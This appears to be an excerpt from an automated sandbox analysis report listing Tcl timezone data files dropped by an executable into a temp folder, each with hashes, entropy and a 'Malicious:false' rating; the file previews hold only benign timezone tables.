                                                                                                                                                                                                                                                    SSDEEP:192:XYtQYUKXZRMavqQS8L2En/RDmzTWRf2oFnoF8l988fL8vG+81VcfnrpbX+qvlrPf:gQYzCO4alKqYvuOdeYP/Jv
                                                                                                                                                                                                                                                    MD5:C1F34BD1FB4402481FFA5ABEE1573085
                                                                                                                                                                                                                                                    SHA1:46B9AD38086417554549C36A40487140256BED57
                                                                                                                                                                                                                                                    SHA-256:A4C2F586D7F59A192D6D326AD892C8BE20753FB4D315D506F4C2ED9E3F657B9A
                                                                                                                                                                                                                                                    SHA-512:115D3E65A6A3834E748ED1917CF03A835F74EC0F8DB789C2B99EB78879EA3A5A2AFEB35981BA221D868E6A5B579374CFB3F865ACF6D4271B918EBCC2C3C69579
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Moncton) {. {-9223372036854775808 -15548 0 LMT}. {-2715882052 -18000 0 EST}. {-2131642800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1167595200 -14400 0 AST}. {-1153681200 -10800 1 ADT}. {-1145822400 -14400 0 AST}. {-1122231600 -10800 1 ADT}. {-1114372800 -14400 0 AST}. {-1090782000 -10800 1 ADT}. {-1082923200 -14400 0 AST}. {-1059332400 -10800 1 ADT}. {-1051473600 -14400 0 AST}. {-1027882800 -10800 1 ADT}. {-1020024000 -14400 0 AST}. {-996433200 -10800 1 ADT}. {-988574400 -14400 0 AST}. {-965674800 -10800 1 ADT}. {-955396800 -14400 0 AST}. {-934743600 -10800 1 ADT}. {-923947200 -14400 0 AST}. {-904503600 -10800 1 ADT}. {-891892800 -14400 0 AST}. {-883598400 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-757368000 -14400 0 AST}. {-747252000 -10800 1 ADT}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Monterrey

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6496
                                                                                                                                                                                                                                                    Entropy (8bit):3.75909042772931
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Xc+vN41+z6stuNEsRZjWqZL/1dCYDXEaXTuXMEXiH4RxGIJkYWXsWwav7jNf4sOt:saN41+z6stuNEsRZjWqZL/1dCYDDCxyI
                                                                                                                                                                                                                                                    MD5:255A5A8E27CA1F0127D71E09033C6D9B
                                                                                                                                                                                                                                                    SHA1:4F1C5E6D3F9E5BC9F8958FA50C195FDADD0F4022
                                                                                                                                                                                                                                                    SHA-256:C753DEF7056E26D882DCD842729816890D42B6C7E31522111467C0C39A24B2F2
                                                                                                                                                                                                                                                    SHA-512:96A67C3CC54EC39086D4DF681DDA39B4167FE80F0C45600045480F28C282071915F793BD672146119A22E0C15339F162DFF9DF326E7132E723684EF079666F58
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Monterrey) {. {-9223372036854775808 -24076 0 LMT}. {-1514743200 -21600 0 CST}. {568015200 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {599637600 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {891763200 -18000 1 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 C

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Montevideo

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2743
                                                                                                                                                                                                                                                    Entropy (8bit):3.9155970425124305
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5JnGSNS1SnEcSFS38ZSrSdkSaSKSLrSzSCjRpJXCDBtYtklyBZDxfNaEZt84gBKz:XnG6+JcKN0FXVMspFpFCDBStklyBZDFN
                                                                                                                                                                                                                                                    MD5:0D5E1C83C4A15FC0D2FC3D6D75F3B1AD
                                                                                                                                                                                                                                                    SHA1:21A2F0D7B6E970EA0F9BAF21780627583A01BEDF
                                                                                                                                                                                                                                                    SHA-256:9D5BFEECB613C4CDDA20131EECFDD1A077E9843AF09CAFDBE4AD6855B2A1D3A9
                                                                                                                                                                                                                                                    SHA-512:3811F5F69DA1ABDF209BCDFB713F149B94F61AEC38B1DC2A71A88898074AB07D4F6B6F2CCD39E4882E349361B1C6EAE3EE3B98F132EE9401174404F3403D98D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Montevideo) {. {-9223372036854775808 -13484 0 LMT}. {-2256668116 -13484 0 MMT}. {-1567455316 -12600 0 UYT}. {-1459542600 -10800 1 UYHST}. {-1443819600 -12600 0 UYT}. {-1428006600 -10800 1 UYHST}. {-1412283600 -12600 0 UYT}. {-1396470600 -10800 1 UYHST}. {-1380747600 -12600 0 UYT}. {-1141590600 -10800 1 UYHST}. {-1128286800 -12600 0 UYT}. {-1110141000 -10800 1 UYHST}. {-1096837200 -12600 0 UYT}. {-1078691400 -10800 1 UYHST}. {-1065387600 -12600 0 UYT}. {-1046637000 -10800 1 UYHST}. {-1033938000 -12600 0 UYT}. {-1015187400 -10800 1 UYHST}. {-1002488400 -12600 0 UYT}. {-983737800 -10800 1 UYHST}. {-971038800 -12600 0 UYT}. {-952288200 -10800 1 UYHST}. {-938984400 -12600 0 UYT}. {-920838600 -10800 1 UYHST}. {-907534800 -12600 0 UYT}. {-896819400 -10800 1 UYHST}. {-853623000 -10800 0 UYT}. {-853621200 -7200 1 UYST}. {-845848800 -10800 0 UYT}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Montreal

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.696915330047381
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0qMKLRXIVAIg20qMKLRI62IAcGEzQ21h4IAcGEqMKR:SlSWB9IZaM3y7RQ+VAIgpRQ+6290zQg2
                                                                                                                                                                                                                                                    MD5:F4631583229AD8B12C548E624AAF4A9F
                                                                                                                                                                                                                                                    SHA1:C56022CEACBD910C9CBF8C39C974021294AEE9DA
                                                                                                                                                                                                                                                    SHA-256:884575BE85D1276A1AE3426F33153B3D4787AC5238FDBE0991C6608E7EB0DF07
                                                                                                                                                                                                                                                    SHA-512:48FB9910D8A75AD9451C860716746D38B29319CA04DF9E8690D62FB875A5BEBCC7A8C546A60878821BD68A83271C69671D483C3133E4F807F2C3AC899CEBF065
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Toronto)]} {. LoadTimeZoneFile America/Toronto.}.set TZData(:America/Montreal) $TZData(:America/Toronto).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Montserrat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):205
                                                                                                                                                                                                                                                    Entropy (8bit):4.865859395466201
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y7eoFVAIgpeX290zQ1HK90e/:MBaIMY9QpI290zQ490O
                                                                                                                                                                                                                                                    MD5:705E51A8FB38AA8F9714256AFB55DA8A
                                                                                                                                                                                                                                                    SHA1:97D96BE4C08F128E739D541A43057F08D24DDDCF
                                                                                                                                                                                                                                                    SHA-256:0FED15D7D58E8A732110FF6765D0D148D15ACBB0251EE867CE7596933E999865
                                                                                                                                                                                                                                                    SHA-512:4D7E42ECDB16F7A8A62D9EDA1E365325F3CBFAA1EF0E9FEE2790E24BA8DEAAA716D41F9389B849C69DC3973DA61D575146932FB2C8AC81579C65C18E45AE386E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Montserrat) $TZData(:America/Port_of_Spain).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Nassau

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8260
                                                                                                                                                                                                                                                    Entropy (8bit):3.7353311910027376
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:JUzoaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:Gzorn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:6F9F530A792FC34E2B0CEE4BC3DB3809
                                                                                                                                                                                                                                                    SHA1:4DF8A4A6993E47DD5A710BEE921D88FEF44858E7
                                                                                                                                                                                                                                                    SHA-256:9F62117DDA0A21D37B63C9083B3C50572399B22D640262F427D68123078B32F9
                                                                                                                                                                                                                                                    SHA-512:C2BF93FDBE8430113FA63561D1A08145DCF31CD679AB7230098993C7A19EF0F29F486C962656F8A62505CB1BFE993FBD3BB5FB0BAE7B6E7E190DE2865C445408
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nassau) {. {-9223372036854775808 -18570 0 LMT}. {-1825095030 -18000 0 EST}. {-179341200 -14400 1 EDT}. {-163620000 -18000 0 EST}. {-147891600 -14400 1 EDT}. {-131565600 -18000 0 EST}. {-116442000 -14400 1 EDT}. {-100116000 -18000 0 EST}. {-84387600 -14400 1 EDT}. {-68666400 -18000 0 EST}. {-52938000 -14400 1 EDT}. {-37216800 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {189320400 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\New_York

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11004
                                                                                                                                                                                                                                                    Entropy (8bit):3.725417189649631
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:iNXYUiZrbgZ8UMr5UwdaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:23iZrbgZ8UMr2wdrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:C9D78AB6CF796A9D504BE2903F00B49C
                                                                                                                                                                                                                                                    SHA1:A6C0E4135986A1A6F36B62276BFAB396DA1A4A9B
                                                                                                                                                                                                                                                    SHA-256:1AB6E47D96BC34F57D56B936233F58B5C748B65E06AFF6449C3E3C317E411EFE
                                                                                                                                                                                                                                                    SHA-512:6D20B13F337734CB58198396477B7C0E9CB89ED4D7AB328C22A4A528CAF187D10F42540DBB4514A0C139E6F4AE9A1A71AED02E3735D1D4F12C5314014C0C1EB6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/New_York) {. {-9223372036854775808 -17762 0 LMT}. {-2717650800 -18000 0 EST}. {-1633280400 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1601830800 -14400 1 EDT}. {-1583690400 -18000 0 EST}. {-1577905200 -18000 0 EST}. {-1570381200 -14400 1 EDT}. {-1551636000 -18000 0 EST}. {-1536512400 -14400 1 EDT}. {-1523210400 -18000 0 EST}. {-1504458000 -14400 1 EDT}. {-1491760800 -18000 0 EST}. {-1473008400 -14400 1 EDT}. {-1459706400 -18000 0 EST}. {-1441558800 -14400 1 EDT}. {-1428256800 -18000 0 EST}. {-1410109200 -14400 1 EDT}. {-1396807200 -18000 0 EST}. {-1378659600 -14400 1 EDT}. {-1365357600 -18000 0 EST}. {-1347210000 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-122080680

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Nipigon

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7836
                                                                                                                                                                                                                                                    Entropy (8bit):3.7462966187089535
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:rEa2raC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:rYrrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:3D389AA51D3E29E8A1E8ED07646AA0DD
                                                                                                                                                                                                                                                    SHA1:2E3DF9406B14662ADEDDC0F891CD81DF23D98157
                                                                                                                                                                                                                                                    SHA-256:3A0FB897E5CCB31B139E009B909053DCE36BB5791ACF23529D874AFA9F0BB405
                                                                                                                                                                                                                                                    SHA-512:AFF7B30355ECB6EBD43D1E6C943C250AB98CC82BDC8DDC7595769E4CE188A23591AEFCF18A028CC6479CF6AA20F65980E37C74F6CEE907537366136FAF29B66E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nipigon) {. {-9223372036854775808 -21184 0 LMT}. {-2366734016 -18000 0 EST}. {-1632070800 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-923252400 -14400 1 EDT}. {-880218000 -14400 0 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {136364400 -14400 1 EDT}. {152085600 -18000 0 EST}. {167814000 -14400 1 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Nome

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8404
                                                                                                                                                                                                                                                    Entropy (8bit):3.8859165156616937
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:OMmWQm825s/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:OMmWQmI/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                    MD5:ECBBCB3C63125333C1339EFF2C02BACE
                                                                                                                                                                                                                                                    SHA1:293B8D9314F57F54A7C0457C0C661A5DB2EFE026
                                                                                                                                                                                                                                                    SHA-256:9739527976A9FF2753C1D986C3901F9A537E1F9387BE2543BB00257DD9D8881A
                                                                                                                                                                                                                                                    SHA-512:AB22FC48ABC2B773522F37B929961774B80B1EF4CE76837AEDB1E6640DEB4D8C46CE89E3A24854F2D684579EB1BD9790AF9EBDFF3556A621ECB2AF66F32EC256
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Nome) {. {-9223372036854775808 46701 0 LMT}. {-3225358701 -39698 0 LMT}. {-2188947502 -39600 0 NST}. {-883573200 -39600 0 NST}. {-880196400 -36000 1 NWT}. {-769395600 -36000 1 NPT}. {-765374400 -39600 0 NST}. {-757342800 -39600 0 NST}. {-86878800 -39600 0 BST}. {-31496400 -39600 0 BST}. {-21466800 -36000 1 BDT}. {-5745600 -39600 0 BST}. {9982800 -36000 1 BDT}. {25704000 -39600 0 BST}. {41432400 -36000 1 BDT}. {57758400 -39600 0 BST}. {73486800 -36000 1 BDT}. {89208000 -39600 0 BST}. {104936400 -36000 1 BDT}. {120657600 -39600 0 BST}. {126709200 -36000 1 BDT}. {152107200 -39600 0 BST}. {162392400 -36000 1 BDT}. {183556800 -39600 0 BST}. {199285200 -36000 1 BDT}. {215611200 -39600 0 BST}. {230734800 -36000 1 BDT}. {247060800 -39600 0 BST}. {262789200 -36000 1 BDT}. {278510400 -39600 0 BST}. {294238800 -36000 1 BDT}. {309960000 -3

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Noronha

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1368
                                                                                                                                                                                                                                                    Entropy (8bit):4.01376478240381
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ8eHChYsS590B74LmCUGXx1bvzbsgEfKaccbMuSEh:5ghYsSDK74LmCUGB1bvzbsgEfK1couSK
                                                                                                                                                                                                                                                    MD5:38D2ADBD4CC7A54D3EDDC120BE4E32E9
                                                                                                                                                                                                                                                    SHA1:07AEFC41171850277C4ECF30B3C5108ED196926D
                                                                                                                                                                                                                                                    SHA-256:03C9461769527F6D7639E79CBACB71452B01BA08172D1105D2AC36458622F0D7
                                                                                                                                                                                                                                                    SHA-512:F6FBE1E1AB9D66A12DEEAC6FA5536B0ACFC9F777D5E270B05BD3144B1065AE02BEC157A57686F5EDA443498BA1B01B9F445C902ADCB33412FE73036AD3B29CFE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Noronha) {. {-9223372036854775808 -7780 0 LMT}. {-1767217820 -7200 0 FNT}. {-1206961200 -3600 1 FNST}. {-1191366000 -7200 0 FNT}. {-1175378400 -3600 1 FNST}. {-1159830000 -7200 0 FNT}. {-633823200 -3600 1 FNST}. {-622072800 -7200 0 FNT}. {-602287200 -3600 1 FNST}. {-591836400 -7200 0 FNT}. {-570751200 -3600 1 FNST}. {-560214000 -7200 0 FNT}. {-539128800 -3600 1 FNST}. {-531356400 -7200 0 FNT}. {-191368800 -3600 1 FNST}. {-184201200 -7200 0 FNT}. {-155167200 -3600 1 FNST}. {-150073200 -7200 0 FNT}. {-128901600 -3600 1 FNST}. {-121129200 -7200 0 FNT}. {-99957600 -3600 1 FNST}. {-89593200 -7200 0 FNT}. {-68421600 -3600 1 FNST}. {-57970800 -7200 0 FNT}. {499744800 -3600 1 FNST}. {511232400 -7200 0 FNT}. {530589600 -3600 1 FNST}. {540262800 -7200 0 FNT}. {562125600 -3600 1 FNST}. {571194000 -7200 0 FNT}. {592970400 -3600 1 FNST}. {6

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\North_Dakota\Beulah

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8278
                                                                                                                                                                                                                                                    Entropy (8bit):3.7975723806562063
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:raF2dVtXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Dac5TE35:OFcVtXwDTIRqfh57Tlto//q7u379zlqw
                                                                                                                                                                                                                                                    MD5:15AABAE9ABE4AF7ABEADF24A510E9583
                                                                                                                                                                                                                                                    SHA1:3DEF11310D02F0492DF09591A039F46A8A72D086
                                                                                                                                                                                                                                                    SHA-256:B328CC893D217C4FB6C84AA998009940BFBAE240F944F40E7EB900DEF1C7A5CF
                                                                                                                                                                                                                                                    SHA-512:7A12A25EB6D6202C47CFDD9F3CE71342406F0EDA3D1D68B842BCFE97EFF1F2E0C11AD34D4EE0A61DF7E0C7E8F400C8CCA73230BDB3C677F8D15CE5CBA44775D7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/Beulah) {. {-9223372036854775808 -24427 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MS

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\North_Dakota\Center

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8278
                                                                                                                                                                                                                                                    Entropy (8bit):3.7834920003907664
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:LF2dK7X0N41+IestuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaT:LFcK7X0N41+IestuNEbYkzbXwDTIRqfK
                                                                                                                                                                                                                                                    MD5:AC804124F4CE4626F5C1FDA2BC043011
                                                                                                                                                                                                                                                    SHA1:4B3E8CC90671BA543112CEE1AB5450C6EA4615DF
                                                                                                                                                                                                                                                    SHA-256:E90121F7D275FDCC7B8DCDEC5F8311194D432510FEF5F5F0D6F211A4AACB78EF
                                                                                                                                                                                                                                                    SHA-512:056EF65693C16CB58EC5A223528C636346DB37B75000397D03663925545979792BBC50B20B5AA20139ECE9A9D6B73DA80C2319AA4F0609D6FC1A6D30D0567C58
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/North_Dakota/Center) {. {-9223372036854775808 -24312 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {126694800 -21600 1 MDT}. {152092800 -25200 0 MST}. {162378000 -21600 1 MDT}. {183542400 -25200 0 MST}. {199270800 -21600 1 MDT}. {215596800 -25200 0 MST}. {230720400 -21600 1 MDT}. {247046400 -25200 0 MS

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\North_Dakota\New_Salem

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8281
                                                                                                                                                                                                                                                    Entropy (8bit):3.795939700557522
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:uF2dyuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Da:uFcyuNEbYkzbXwDTIRqfh57Tlto//q7k
                                                                                                                                                                                                                                                    MD5:E26FC508DFD73B610C5543487C763FF5
                                                                                                                                                                                                                                                    SHA1:8FBDE67AF561037AAA2EDF93E9456C7E534F4B5A
                                                                                                                                                                                                                                                    SHA-256:387D3C57EDE8CCAAD0655F19B35BC0D124C016D16F06B6F2498C1151E4792778
                                                                                                                                                                                                                                                    SHA-512:8A10B7370D1521EDF18AB4D5192C930ABC68AB9AE718ADF3D175EACE9A1F5DAC690A76B02EFB4059374761962D8C2660497F8E951DFE9812FB3CFCFDF9165E45
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
